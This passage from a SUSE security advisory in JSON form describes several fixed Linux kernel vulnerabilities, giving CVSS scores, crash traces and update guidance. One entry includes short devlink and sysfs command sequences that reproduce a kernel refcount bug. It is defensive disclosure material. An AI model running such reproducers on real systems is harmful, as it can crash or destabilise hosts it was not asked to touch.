https://lore.kernel.org/netdev/20250317-vsock-trans-signal-race-v4-0-fc8837f3f1d4@rbox.co/\n[3]: https://lore.kernel.org/netdev/60f1b7db-3099-4f6a-875e-af9f6ef194f6@rbox.co/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40248",
"url": "https://www.suse.com/security/cve/CVE-2025-40248"
},
{
"category": "external",
"summary": "SUSE Bug 1254864 for CVE-2025-40248",
"url": "https://bugzilla.suse.com/1254864"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40248"
},
{
"cve": "CVE-2025-40250",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40250"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Clean up only new IRQ glue on request_irq() failure\n\nThe mlx5_irq_alloc() function can inadvertently free the entire rmap\nand end up in a crash[1] when the other threads tries to access this,\nwhen request_irq() fails due to exhausted IRQ vectors. This commit\nmodifies the cleanup to remove only the specific IRQ mapping that was\njust added.\n\nThis prevents removal of other valid mappings and ensures precise\ncleanup of the failed IRQ allocation\u0027s associated glue object.\n\nNote: This error is observed when both fwctl and rds configs are enabled.\n\n[1]\nmlx5_core 0000:05:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:06:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\ngeneral protection fault, probably for non-canonical address\n0xe277a58fde16f291: 0000 [#1] SMP NOPTI\n\nRIP: 0010:free_irq_cpu_rmap+0x23/0x7d\nCall Trace:\n \u003cTASK\u003e\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n ? __die_body.cold+0x8/0xa\n ? die_addr+0x39/0x53\n ? exc_general_protection+0x1c4/0x3e9\n ? dev_vprintk_emit+0x5f/0x90\n ? asm_exc_general_protection+0x22/0x27\n ? free_irq_cpu_rmap+0x23/0x7d\n mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n irq_pool_request_vector+0x7d/0x90 [mlx5_core]\n mlx5_irq_request+0x2e/0xe0 [mlx5_core]\n mlx5_irq_request_vector+0xad/0xf7 [mlx5_core]\n comp_irq_request_pci+0x64/0xf0 [mlx5_core]\n create_comp_eq+0x71/0x385 [mlx5_core]\n ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core]\n mlx5_comp_eqn_get+0x72/0x90 [mlx5_core]\n ? xas_load+0x8/0x91\n mlx5_comp_irqn_get+0x40/0x90 [mlx5_core]\n mlx5e_open_channel+0x7d/0x3c7 [mlx5_core]\n mlx5e_open_channels+0xad/0x250 [mlx5_core]\n mlx5e_open_locked+0x3e/0x110 [mlx5_core]\n mlx5e_open+0x23/0x70 [mlx5_core]\n __dev_open+0xf1/0x1a5\n __dev_change_flags+0x1e1/0x249\n dev_change_flags+0x21/0x5c\n do_setlink+0x28b/0xcc4\n ? __nla_parse+0x22/0x3d\n ? inet6_validate_link_af+0x6b/0x108\n ? cpumask_next+0x1f/0x35\n ? __snmp6_fill_stats64.constprop.0+0x66/0x107\n ? __nla_validate_parse+0x48/0x1e6\n __rtnl_newlink+0x5ff/0xa57\n ? kmem_cache_alloc_trace+0x164/0x2ce\n rtnl_newlink+0x44/0x6e\n rtnetlink_rcv_msg+0x2bb/0x362\n ? __netlink_sendskb+0x4c/0x6c\n ? netlink_unicast+0x28f/0x2ce\n ? rtnl_calcit.isra.0+0x150/0x146\n netlink_rcv_skb+0x5f/0x112\n netlink_unicast+0x213/0x2ce\n netlink_sendmsg+0x24f/0x4d9\n __sock_sendmsg+0x65/0x6a\n ____sys_sendmsg+0x28f/0x2c9\n ? import_iovec+0x17/0x2b\n ___sys_sendmsg+0x97/0xe0\n __sys_sendmsg+0x81/0xd8\n do_syscall_64+0x35/0x87\n entry_SYSCALL_64_after_hwframe+0x6e/0x0\nRIP: 0033:0x7fc328603727\nCode: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed\nff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00\nf0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48\nRSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727\nRDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d\nRBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000\nR13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40250",
"url": "https://www.suse.com/security/cve/CVE-2025-40250"
},
{
"category": "external",
"summary": "SUSE Bug 1254854 for CVE-2025-40250",
"url": "https://bugzilla.suse.com/1254854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40250"
},
{
"cve": "CVE-2025-40251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40251"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: rate: Unset parent pointer in devl_rate_nodes_destroy\n\nThe function devl_rate_nodes_destroy is documented to \"Unset parent for\nall rate objects\". However, it was only calling the driver-specific\n`rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing\nthe parent\u0027s refcount, without actually setting the\n`devlink_rate-\u003eparent` pointer to NULL.\n\nThis leaves a dangling pointer in the `devlink_rate` struct, which cause\nrefcount error in netdevsim[1] and mlx5[2]. In addition, this is\ninconsistent with the behavior of `devlink_nl_rate_parent_node_set`,\nwhere the parent pointer is correctly cleared.\n\nThis patch fixes the issue by explicitly setting `devlink_rate-\u003eparent`\nto NULL after notifying the driver, thus fulfilling the function\u0027s\ndocumented behavior for all rate objects.\n\n[1]\nrepro steps:\necho 1 \u003e /sys/bus/netdevsim/new_device\ndevlink dev eswitch set netdevsim/netdevsim1 mode switchdev\necho 1 \u003e /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs\ndevlink port function rate add netdevsim/netdevsim1/test_node\ndevlink port function rate set netdevsim/netdevsim1/128 parent test_node\necho 1 \u003e /sys/bus/netdevsim/del_device\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n __nsim_dev_port_del+0x6c/0x70 [netdevsim]\n nsim_dev_reload_destroy+0x11c/0x140 [netdevsim]\n nsim_drv_remove+0x2b/0xb0 [netdevsim]\n device_release_driver_internal+0x194/0x1f0\n bus_remove_device+0xc6/0x130\n device_del+0x159/0x3c0\n device_unregister+0x1a/0x60\n del_device_store+0x111/0x170 [netdevsim]\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x55/0x10f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n[2]\ndevlink dev eswitch set pci/0000:08:00.0 mode switchdev\ndevlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000\ndevlink port function rate add pci/0000:08:00.0/group1\ndevlink port function rate set pci/0000:08:00.0/32768 parent group1\nmodprobe -r mlx5_ib mlx5_fwctl mlx5_core\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core]\n mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core]\n mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core]\n mlx5_sf_esw_event+0xc4/0x120 [mlx5_core]\n notifier_call_chain+0x33/0xa0\n blocking_notifier_call_chain+0x3b/0x50\n mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core]\n mlx5_eswitch_disable+0x63/0x90 [mlx5_core]\n mlx5_unload+0x1d/0x170 [mlx5_core]\n mlx5_uninit_one+0xa2/0x130 [mlx5_core]\n remove_one+0x78/0xd0 [mlx5_core]\n pci_device_remove+0x39/0xa0\n device_release_driver_internal+0x194/0x1f0\n unbind_store+0x99/0xa0\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x53/0x1f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40251",
"url": "https://www.suse.com/security/cve/CVE-2025-40251"
},
{
"category": "external",
"summary": "SUSE Bug 1254856 for CVE-2025-40251",
"url": "https://bugzilla.suse.com/1254856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40251"
},
{
"cve": "CVE-2025-40252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end()\n\nThe loops in \u0027qede_tpa_cont()\u0027 and \u0027qede_tpa_end()\u0027, iterate\nover \u0027cqe-\u003elen_list[]\u0027 using only a zero-length terminator as\nthe stopping condition. If the terminator was missing or\nmalformed, the loop could run past the end of the fixed-size array.\n\nAdd an explicit bound check using ARRAY_SIZE() in both loops to prevent\na potential out-of-bounds access.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40252",
"url": "https://www.suse.com/security/cve/CVE-2025-40252"
},
{
"category": "external",
"summary": "SUSE Bug 1254849 for CVE-2025-40252",
"url": "https://bugzilla.suse.com/1254849"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40252"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: also call xfrm_state_delete_tunnel at destroy time for states that were never added\n\nIn commit b441cf3f8c4b (\"xfrm: delete x-\u003etunnel as we delete x\"), I\nmissed the case where state creation fails between full\ninitialization (-\u003einit_state has been called) and being inserted on\nthe lists.\n\nIn this situation, -\u003einit_state has been called, so for IPcomp\ntunnels, the fallback tunnel has been created and added onto the\nlists, but the user state never gets added, because we fail before\nthat. The user state doesn\u0027t go through __xfrm_state_delete, so we\ndon\u0027t call xfrm_state_delete_tunnel for those states, and we end up\nleaking the FB tunnel.\n\nThere are several codepaths affected by this: the add/update paths, in\nboth net/key and xfrm, and the migrate code (xfrm_migrate,\nxfrm_state_migrate). A \"proper\" rollback of the init_state work would\nprobably be doable in the add/update code, but for migrate it gets\nmore complicated as multiple states may be involved.\n\nAt some point, the new (not-inserted) state will be destroyed, so call\nxfrm_state_delete_tunnel during xfrm_state_gc_destroy. Most states\nwill have their fallback tunnel cleaned up during __xfrm_state_delete,\nwhich solves the issue that b441cf3f8c4b (and other patches before it)\naimed at. All states (including FB tunnels) will be removed from the\nlists once xfrm_state_fini has called flush_work(\u0026xfrm_state_gc_work).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40256",
"url": "https://www.suse.com/security/cve/CVE-2025-40256"
},
{
"category": "external",
"summary": "SUSE Bug 1254851 for CVE-2025-40256",
"url": "https://bugzilla.suse.com/1254851"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40256"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n 